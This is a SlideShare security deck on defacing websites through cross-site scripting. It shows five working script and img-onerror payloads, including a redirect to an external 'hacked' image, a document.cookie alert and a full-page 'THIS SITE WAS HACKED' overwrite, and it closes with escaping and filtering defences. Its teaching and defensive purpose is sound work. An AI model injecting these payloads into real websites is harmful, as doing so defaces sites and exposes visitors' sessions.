SlideShare a Scribd company logo

Cross Site Scripting - Web Defacement Techniques

Download as PPTX, PDF
Ronan Dunne, CEH, SSCP
Ronan Dunne, CEH, SSCP
Technology
1 of 9
Introduction • Website defacement is an attack on a website that changes the visual appearance of the site or a webpage. Defacing is one of the most common things when the hacker found the vulnerability in website. • Defacement is generally meant as a kind of electronic graffiti, although recently it has become a means to spread messages by politically motivated "cyber protesters" or hacktivists.
Testing • Test will be entered and captured each time using OWASPs ZAP Proxy. Once this is captured we will the replace the Test with our malicious code in turn bypassing the client-side preventions the web site has in place.
1 • Redirected to hacked Image out of the App Domain <script>window.location="http://www.theblacktechreport.com/wp content/uploads/2011/01/hacked.jpg";</script>
2 • Adds a hacked image to the page <img src="http://www.theblacktechreport.com/wp-content/uploads/2011/01/hacked.jpg" onerror=alert(document.cookie);>
3 • Cover full page with Hacked - in App Domain <script>document.body.innerHTML="<style>body{visibility:hidden;}</style><div style=visibility:visible;><h1>THIS SITE WAS HACKED</h1></div>";</script>
4 • Change background to RED - in App Domain <script>document.body.bgColor="red";</script>
5 • Set the background to Hacked Image- in App Domain  <script>document.body.background="http://www.theblacktechreport.com/wpcontent/uploads/2011/01/hacked.jpg";</script>
1 Use regular expressions on the server side to filter out all hazardous input when possible. If any or all of this characters is needed by the application, properly escaping is enough. A non comprehensive list of characters likely to be part of an attack vector is: • • • • • • • • • • • • <> (triangular parenthesis) () (parenthesis) " (quotation mark) & (ampersand sign) ' (single apostrophe) + (plus sign) % (percent sign) = (equals sign) : (colon) ` (forward tick) ; (semicolon) ´ (back tick) 2 Escape all the untrusted output before presenting to the UI. Follow the rules detailed in the next link to ensure proper escaping for every context and location: https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_ Cheat_Sheet 3 When possible, it is recommended to enforce a specific charset encoding (using 'Content-Type' header or <meta> tag).

Recommended

Microsoft Azure Cloud Services
Microsoft Azure Cloud ServicesMicrosoft Azure Cloud Services
Microsoft Azure Cloud Services
David J Rosenthal
 
Azure Cloud PPT
Azure Cloud PPTAzure Cloud PPT
Azure Cloud PPT
Aniket Kanitkar
 
Virtualization in Cloud Computing and Machine reference Model
Virtualization in Cloud Computing and Machine reference ModelVirtualization in Cloud Computing and Machine reference Model
Virtualization in Cloud Computing and Machine reference Model
Dr Neelesh Jain
 
Cloud computing using Eucalyptus
Cloud computing using EucalyptusCloud computing using Eucalyptus
Cloud computing using Eucalyptus
Abhishek Dey
 
Reengineering including reverse & forward Engineering
Reengineering including reverse & forward EngineeringReengineering including reverse & forward Engineering
Reengineering including reverse & forward Engineering
Muhammad Chaudhry
 
AWS Training For Beginners | AWS Certified Solutions Architect Tutorial | AWS...
AWS Training For Beginners | AWS Certified Solutions Architect Tutorial | AWS...AWS Training For Beginners | AWS Certified Solutions Architect Tutorial | AWS...
AWS Training For Beginners | AWS Certified Solutions Architect Tutorial | AWS...
Simplilearn
 
Unified process Model
Unified process ModelUnified process Model
Unified process Model
University of Haripur
 
Introducing AWS Cloud9
Introducing AWS Cloud9Introducing AWS Cloud9
Introducing AWS Cloud9
Amazon Web Services
 

Recommended

Microsoft Azure Cloud Services
Microsoft Azure Cloud ServicesMicrosoft Azure Cloud Services
Microsoft Azure Cloud Services
David J Rosenthal
 
Azure Cloud PPT
Azure Cloud PPTAzure Cloud PPT
Azure Cloud PPT
Aniket Kanitkar
 
Virtualization in Cloud Computing and Machine reference Model
Virtualization in Cloud Computing and Machine reference ModelVirtualization in Cloud Computing and Machine reference Model
Virtualization in Cloud Computing and Machine reference Model
Dr Neelesh Jain
 
Cloud computing using Eucalyptus
Cloud computing using EucalyptusCloud computing using Eucalyptus
Cloud computing using Eucalyptus
Abhishek Dey
 
Reengineering including reverse & forward Engineering
Reengineering including reverse & forward EngineeringReengineering including reverse & forward Engineering
Reengineering including reverse & forward Engineering
Muhammad Chaudhry
 
AWS Training For Beginners | AWS Certified Solutions Architect Tutorial | AWS...
AWS Training For Beginners | AWS Certified Solutions Architect Tutorial | AWS...AWS Training For Beginners | AWS Certified Solutions Architect Tutorial | AWS...
AWS Training For Beginners | AWS Certified Solutions Architect Tutorial | AWS...
Simplilearn
 
Unified process Model
Unified process ModelUnified process Model
Unified process Model
University of Haripur
 
Introducing AWS Cloud9
Introducing AWS Cloud9Introducing AWS Cloud9
Introducing AWS Cloud9
Amazon Web Services
 
Microsoft az-104 Dumps
Microsoft az-104 DumpsMicrosoft az-104 Dumps
Microsoft az-104 Dumps
Armstrongsmith
 
Windows Azure Virtual Machines
Windows Azure Virtual MachinesWindows Azure Virtual Machines
Windows Azure Virtual Machines
Clint Edmonson
 
Amazon EC2 Masterclass
Amazon EC2 MasterclassAmazon EC2 Masterclass
Amazon EC2 Masterclass
Amazon Web Services
 
Introduction to Microsoft Azure Cloud
Introduction to Microsoft Azure CloudIntroduction to Microsoft Azure Cloud
Introduction to Microsoft Azure Cloud
Dinesh Kumar Wickramasinghe
 
Microsoft azure
Microsoft azureMicrosoft azure
Microsoft azure
Mohammad Ilyas Malik
 
Supplier Risk Pugh Matrix
Supplier Risk Pugh MatrixSupplier Risk Pugh Matrix
Supplier Risk Pugh Matrix
Lewis Adams
 
Clustering and High Availability
Clustering and High Availability Clustering and High Availability
Clustering and High Availability
Information Technology
 
The Layman's Guide to Microsoft Azure
The Layman's Guide to Microsoft AzureThe Layman's Guide to Microsoft Azure
The Layman's Guide to Microsoft Azure
Aptera Inc
 
Introduction to Amazon EC2
Introduction to Amazon EC2Introduction to Amazon EC2
Introduction to Amazon EC2
Amazon Web Services
 
AWS vs Azure | AWS vs Azure Comparison | Difference Between AWS And Azure | S...
AWS vs Azure | AWS vs Azure Comparison | Difference Between AWS And Azure | S...AWS vs Azure | AWS vs Azure Comparison | Difference Between AWS And Azure | S...
AWS vs Azure | AWS vs Azure Comparison | Difference Between AWS And Azure | S...
Simplilearn
 
Introduction to Design Pattern
Introduction to Design PatternIntroduction to Design Pattern
Introduction to Design Pattern
Sanae BEKKAR
 
Virtual machine
Virtual machineVirtual machine
Virtual machine
Nikunj Dhameliya
 
Active directory slides
Active directory slidesActive directory slides
Active directory slides
Timothy Moffatt
 
Introduction to Peer-to-Peer Networks
Introduction to Peer-to-Peer Networks Introduction to Peer-to-Peer Networks
Introduction to Peer-to-Peer Networks
Venkatesh Iyer
 
Introduction to Amazon Web Services
Introduction to Amazon Web ServicesIntroduction to Amazon Web Services
Introduction to Amazon Web Services
Amazon Web Services
 
Android - ADB
Android - ADBAndroid - ADB
Android - ADB
Yossi Gruner
 
Client server
Client serverClient server
Client server
National Institute of Biologics
 
Editor config, eslint, prettier
Editor config, eslint, prettierEditor config, eslint, prettier
Editor config, eslint, prettier
Samundra khatri
 
Introduction to AWS Services and Cloud Computing
Introduction to AWS Services and Cloud ComputingIntroduction to AWS Services and Cloud Computing
Introduction to AWS Services and Cloud Computing
Amazon Web Services
 
AWS EC2 Fundametals
AWS EC2 FundametalsAWS EC2 Fundametals
AWS EC2 Fundametals
Piyush Agrawal
 
Web Application Vulnerabilities
Web Application VulnerabilitiesWeb Application Vulnerabilities
Web Application Vulnerabilities
Preetish Panda
 
HackAvert
HackAvertHackAvert
HackAvert
fepinette
 

More Related Content

What's hot

Amazon EC2 Masterclass
Amazon EC2 MasterclassAmazon EC2 Masterclass
Amazon EC2 Masterclass
Amazon Web Services
 
Microsoft azure
Microsoft azureMicrosoft azure
Microsoft azure
Mohammad Ilyas Malik
 
Introduction to Amazon EC2
Introduction to Amazon EC2Introduction to Amazon EC2
Introduction to Amazon EC2
Amazon Web Services
 
AWS vs Azure | AWS vs Azure Comparison | Difference Between AWS And Azure | S...
AWS vs Azure | AWS vs Azure Comparison | Difference Between AWS And Azure | S...AWS vs Azure | AWS vs Azure Comparison | Difference Between AWS And Azure | S...
AWS vs Azure | AWS vs Azure Comparison | Difference Between AWS And Azure | S...
Simplilearn
 
Introduction to Peer-to-Peer Networks
Introduction to Peer-to-Peer Networks Introduction to Peer-to-Peer Networks
Introduction to Peer-to-Peer Networks
Venkatesh Iyer
 

What's hot (20)

Microsoft az-104 Dumps
Microsoft az-104 DumpsMicrosoft az-104 Dumps
Microsoft az-104 Dumps
 
Windows Azure Virtual Machines
Windows Azure Virtual MachinesWindows Azure Virtual Machines
Windows Azure Virtual Machines
 
Amazon EC2 Masterclass
Amazon EC2 MasterclassAmazon EC2 Masterclass
Amazon EC2 Masterclass
 
Introduction to Microsoft Azure Cloud
Introduction to Microsoft Azure CloudIntroduction to Microsoft Azure Cloud
Introduction to Microsoft Azure Cloud
 
Microsoft azure
Microsoft azureMicrosoft azure
Microsoft azure
 
Supplier Risk Pugh Matrix
Supplier Risk Pugh MatrixSupplier Risk Pugh Matrix
Supplier Risk Pugh Matrix
 
Clustering and High Availability
Clustering and High Availability Clustering and High Availability
Clustering and High Availability
 
The Layman's Guide to Microsoft Azure
The Layman's Guide to Microsoft AzureThe Layman's Guide to Microsoft Azure
The Layman's Guide to Microsoft Azure
 
Introduction to Amazon EC2
Introduction to Amazon EC2Introduction to Amazon EC2
Introduction to Amazon EC2
 
AWS vs Azure | AWS vs Azure Comparison | Difference Between AWS And Azure | S...
AWS vs Azure | AWS vs Azure Comparison | Difference Between AWS And Azure | S...AWS vs Azure | AWS vs Azure Comparison | Difference Between AWS And Azure | S...
AWS vs Azure | AWS vs Azure Comparison | Difference Between AWS And Azure | S...
 
Introduction to Design Pattern
Introduction to Design PatternIntroduction to Design Pattern
Introduction to Design Pattern
 
Virtual machine
Virtual machineVirtual machine
Virtual machine
 
Active directory slides
Active directory slidesActive directory slides
Active directory slides
 
Introduction to Peer-to-Peer Networks
Introduction to Peer-to-Peer Networks Introduction to Peer-to-Peer Networks
Introduction to Peer-to-Peer Networks
 
Introduction to Amazon Web Services
Introduction to Amazon Web ServicesIntroduction to Amazon Web Services
Introduction to Amazon Web Services
 
Android - ADB
Android - ADBAndroid - ADB
Android - ADB
 
Client server
Client serverClient server
Client server
 
Editor config, eslint, prettier
Editor config, eslint, prettierEditor config, eslint, prettier
Editor config, eslint, prettier
 
Introduction to AWS Services and Cloud Computing
Introduction to AWS Services and Cloud ComputingIntroduction to AWS Services and Cloud Computing
Introduction to AWS Services and Cloud Computing
 
AWS EC2 Fundametals
AWS EC2 FundametalsAWS EC2 Fundametals
AWS EC2 Fundametals
 

Similar to Cross Site Scripting - Web Defacement Techniques

GeneralMobile Hybrid Development with WordPress
GeneralMobile Hybrid Development with WordPressGeneralMobile Hybrid Development with WordPress
GeneralMobile Hybrid Development with WordPress
GGDBologna
 
Javascript Exploitation
Javascript ExploitationJavascript Exploitation
Javascript Exploitation
Rashid feroz
 
Antisnatchor all you ever wanted to know about beef
Antisnatchor all you ever wanted to know about beefAntisnatchor all you ever wanted to know about beef
Antisnatchor all you ever wanted to know about beef
DefconRussia
 

Similar to Cross Site Scripting - Web Defacement Techniques (20)

Web Application Vulnerabilities
Web Application VulnerabilitiesWeb Application Vulnerabilities
Web Application Vulnerabilities
 
HackAvert
HackAvertHackAvert
HackAvert
 
MR201504 Web Defacing Attacks Targeting WordPress
MR201504 Web Defacing Attacks Targeting WordPressMR201504 Web Defacing Attacks Targeting WordPress
MR201504 Web Defacing Attacks Targeting WordPress
 
Responsive websites. Toolbox
Responsive websites. ToolboxResponsive websites. Toolbox
Responsive websites. Toolbox
 
Web Hacking Series Part 4
Web Hacking Series Part 4Web Hacking Series Part 4
Web Hacking Series Part 4
 
Chrome extensions threat analysis and countermeasures
Chrome extensions threat analysis and countermeasuresChrome extensions threat analysis and countermeasures
Chrome extensions threat analysis and countermeasures
 
Security-Web Vulnerabilities-Browser Attacks
Security-Web Vulnerabilities-Browser AttacksSecurity-Web Vulnerabilities-Browser Attacks
Security-Web Vulnerabilities-Browser Attacks
 
Mobile Hybrid Development with WordPress
Mobile Hybrid Development with WordPressMobile Hybrid Development with WordPress
Mobile Hybrid Development with WordPress
 
GeneralMobile Hybrid Development with WordPress
GeneralMobile Hybrid Development with WordPressGeneralMobile Hybrid Development with WordPress
GeneralMobile Hybrid Development with WordPress
 
Security 101
Security 101Security 101
Security 101
 
VoxxedDays Luxembourg - Abuse web browsers for fun & profits - Dominique Righ...
VoxxedDays Luxembourg - Abuse web browsers for fun & profits - Dominique Righ...VoxxedDays Luxembourg - Abuse web browsers for fun & profits - Dominique Righ...
VoxxedDays Luxembourg - Abuse web browsers for fun & profits - Dominique Righ...
 
WordPress Security and Best Practices
WordPress Security and Best PracticesWordPress Security and Best Practices
WordPress Security and Best Practices
 
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...
 
Postcards from the post xss world- content exfiltration null
Postcards from the post xss world- content exfiltration nullPostcards from the post xss world- content exfiltration null
Postcards from the post xss world- content exfiltration null
 
Are you ready to be hacked?
Are you ready to be hacked?Are you ready to be hacked?
Are you ready to be hacked?
 
Javascript Exploitation
Javascript ExploitationJavascript Exploitation
Javascript Exploitation
 
Cross Site Scripting - Mozilla Security Learning Center
Cross Site Scripting - Mozilla Security Learning CenterCross Site Scripting - Mozilla Security Learning Center
Cross Site Scripting - Mozilla Security Learning Center
 
Antisnatchor all you ever wanted to know about beef
Antisnatchor all you ever wanted to know about beefAntisnatchor all you ever wanted to know about beef
Antisnatchor all you ever wanted to know about beef
 
ZeroNights2012_BeEF_Workshop_antisnatchor
ZeroNights2012_BeEF_Workshop_antisnatchorZeroNights2012_BeEF_Workshop_antisnatchor
ZeroNights2012_BeEF_Workshop_antisnatchor
 
Owasp top 10 2017
Owasp top 10 2017Owasp top 10 2017
Owasp top 10 2017
 

More from Ronan Dunne, CEH, SSCP

Cross Domain Hijacking - File Upload Vulnerability
Cross Domain Hijacking - File Upload VulnerabilityCross Domain Hijacking - File Upload Vulnerability
Cross Domain Hijacking - File Upload Vulnerability
Ronan Dunne, CEH, SSCP
 

More from Ronan Dunne, CEH, SSCP (14)

B wapp – bee bug – installation
B wapp – bee bug – installationB wapp – bee bug – installation
B wapp – bee bug – installation
 
Cross Domain Hijacking - File Upload Vulnerability
Cross Domain Hijacking - File Upload VulnerabilityCross Domain Hijacking - File Upload Vulnerability
Cross Domain Hijacking - File Upload Vulnerability
 
Unicode
UnicodeUnicode
Unicode
 
Kali Linux Installation - VMware
Kali Linux Installation - VMwareKali Linux Installation - VMware
Kali Linux Installation - VMware
 
Error codes & custom 404s
Error codes & custom 404sError codes & custom 404s
Error codes & custom 404s
 
ASP.NET View State - Security Issues
ASP.NET View State - Security IssuesASP.NET View State - Security Issues
ASP.NET View State - Security Issues
 
Blind xss
Blind xssBlind xss
Blind xss
 
Ip v4 & ip v6
Ip v4 & ip v6Ip v4 & ip v6
Ip v4 & ip v6
 
Cross site scripting XSS
Cross site scripting XSSCross site scripting XSS
Cross site scripting XSS
 
Apache Multiview Vulnerability
Apache Multiview VulnerabilityApache Multiview Vulnerability
Apache Multiview Vulnerability
 
Content security policy
Content security policyContent security policy
Content security policy
 
Mime sniffing
Mime sniffingMime sniffing
Mime sniffing
 
Qr codes
Qr codesQr codes
Qr codes
 
Click jacking
Click jackingClick jacking
Click jacking
 

Recently uploaded

Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdfRising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Orbitshub
 
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Victor Rentea
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
sammart93
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Safe Software
 
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
?#DUbAI#??##{{(☎️+971_581248768%)**%*]'#abortion pills for sale in dubai@
 
Architecting Cloud Native Applications
Architecting Cloud Native ApplicationsArchitecting Cloud Native Applications
Architecting Cloud Native Applications
WSO2
 

Recently uploaded (20)

Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
 
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost SavingRepurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
 
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdfRising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
 
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
 
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWEREMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
 
Platformless Horizons for Digital Adaptability
Platformless Horizons for Digital AdaptabilityPlatformless Horizons for Digital Adaptability
Platformless Horizons for Digital Adaptability
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century education
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
 
MS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectorsMS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectors
 
[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdf[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdf
 
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
 
Vector Search -An Introduction in Oracle Database 23ai.pptx
Vector Search -An Introduction in Oracle Database 23ai.pptxVector Search -An Introduction in Oracle Database 23ai.pptx
Vector Search -An Introduction in Oracle Database 23ai.pptx
 
Architecting Cloud Native Applications
Architecting Cloud Native ApplicationsArchitecting Cloud Native Applications
Architecting Cloud Native Applications
 
CNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In PakistanCNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In Pakistan
 
MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024
 
DBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor PresentationDBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor Presentation
 
Introduction to Multilingual Retrieval Augmented Generation (RAG)
Introduction to Multilingual Retrieval Augmented Generation (RAG)Introduction to Multilingual Retrieval Augmented Generation (RAG)
Introduction to Multilingual Retrieval Augmented Generation (RAG)
 

Cross Site Scripting - Web Defacement Techniques

  • 1.
  • 2. Introduction • Website defacement is an attack on a website that changes the visual appearance of the site or a webpage. Defacing is one of the most common things when the hacker found the vulnerability in website. • Defacement is generally meant as a kind of electronic graffiti, although recently it has become a means to spread messages by politically motivated "cyber protesters" or hacktivists.
  • 3. Testing • Test will be entered and captured each time using OWASPs ZAP Proxy. Once this is captured we will the replace the Test with our malicious code in turn bypassing the client-side preventions the web site has in place.
  • 4. 1 • Redirected to hacked Image out of the App Domain <script>window.location="http://www.theblacktechreport.com/wp content/uploads/2011/01/hacked.jpg";</script>
  • 5. 2 • Adds a hacked image to the page <img src="http://www.theblacktechreport.com/wp-content/uploads/2011/01/hacked.jpg" onerror=alert(document.cookie);>
  • 6. 3 • Cover full page with Hacked - in App Domain <script>document.body.innerHTML="<style>body{visibility:hidden;}</style><div style=visibility:visible;><h1>THIS SITE WAS HACKED</h1></div>";</script>
  • 7. 4 • Change background to RED - in App Domain <script>document.body.bgColor="red";</script>
  • 8. 5 • Set the background to Hacked Image- in App Domain  <script>document.body.background="http://www.theblacktechreport.com/wpcontent/uploads/2011/01/hacked.jpg";</script>
  • 9. 1 Use regular expressions on the server side to filter out all hazardous input when possible. If any or all of this characters is needed by the application, properly escaping is enough. A non comprehensive list of characters likely to be part of an attack vector is: • • • • • • • • • • • • <> (triangular parenthesis) () (parenthesis) " (quotation mark) & (ampersand sign) ' (single apostrophe) + (plus sign) % (percent sign) = (equals sign) : (colon) ` (forward tick) ; (semicolon) ´ (back tick) 2 Escape all the untrusted output before presenting to the UI. Follow the rules detailed in the next link to ensure proper escaping for every context and location: https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_ Cheat_Sheet 3 When possible, it is recommended to enforce a specific charset encoding (using 'Content-Type' header or <meta> tag).